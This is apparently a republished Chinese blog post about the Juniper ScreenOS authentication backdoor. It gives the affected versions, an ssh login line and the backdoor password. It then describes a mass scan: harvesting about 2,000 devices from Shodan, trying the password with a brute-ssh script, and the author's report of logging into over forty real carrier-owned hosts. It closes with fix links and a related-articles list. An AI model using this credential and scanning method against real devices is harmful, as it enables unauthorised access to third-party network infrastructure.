Juniper NetScreenOS 後門簡易批量掃描事件介紹受影響版本分析後門密碼批量驗證修複參考

2023-07-02 02:00:55

事件介紹

http://bobao.360.cn/news/detail/2514.html

受影響版本

6.2.0r15 到6.2.0r18

6.3.0r12 到 6.3.0r20

分析

https://community.rapid7.com /community/infosec/blog/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor

後門密碼

ssh [email protected]

然後輸入密碼：
<<< %s(un='%s') = %u


          Juniper NetScreenOS 後門簡易批量掃描事件介紹受影響版本分析後門密碼批量驗證修複參考

批量驗證

使用shodan搜尋，2000餘台裝置

Juniper NetScreenOS 後門簡易批量掃描事件介紹受影響版本分析後門密碼批量驗證修複參考

導出結果檔案，并使用腳本批量驗證是否存在後門密碼

Juniper NetScreenOS 後門簡易批量掃描事件介紹受影響版本分析後門密碼批量驗證修複參考

以上所有檔案在我的github可下載下傳

https://github.com/Xyntax/exps/tree/master/juniperOS-backdoor

shodan導出格式選擇xml

然後使用getIP腳本将導出資料解析成ip清單（存入/dict/ip），将後門密碼存入（/dict/password）

使用python brute-ssh即可批量驗證，結果存儲在（/log/sshd）

注：腳本掃描結果未去重

對org為聯通的500個ip進行掃描，結果發現有四十多台主機可以登入

Juniper NetScreenOS 後門簡易批量掃描事件介紹受影響版本分析後門密碼批量驗證修複參考

修複

http://puluka.com/home/techtalknetworking/screenoscriticalsecurityissue2015.html

參考

http://zone.wooyun.org/content/24531

Juniper NetScreenOS 後門簡易批量掃描事件介紹受影響版本分析後門密碼批量驗證修複參考

事件介紹

受影響版本

分析

後門密碼

批量驗證

修複

參考

繼續閱讀

Maven學習（九）- 建構SSH項目

伺服器遠端控制輕松配

jsp中session過期設定及web.xml配置學習

ssh在linux中---OpenSSH指令操作遠端登入及傳送檔案一.在linux上用ssh連接配接操作另一台linux機子二.ssh或scp指令時提示 WARNINGWARNING: REMOTE HOST IDENTIFICATION HAS CHANGED 三.Linux SSH遠端檔案/目錄傳輸指令scp

ssh架構spring 簡單應用

SSH:Field 'id' doesn't have a default valueField 'id' doesn't have a default value

ssh-ssh整合(Struts2+Spring+Hibernate)

虛拟實驗平台介紹http://www.lupaworld.com/public/lab/

jdk安裝與環境變量配置linux安裝windos安裝

SSH終端管理linux伺服器如何退出後繼續運作服務端

Hydra-密碼破解神器

BurpSuite2021系列（七）Repeater詳解

ssh配置無密碼驗證

web多重攻擊向量滲透測試——SET工具包

記一次GoldenEye靶場滲透測試過程一、資訊收集二、漏洞探測三、漏洞利用四、提權

sshd dead but subsys locked問題解決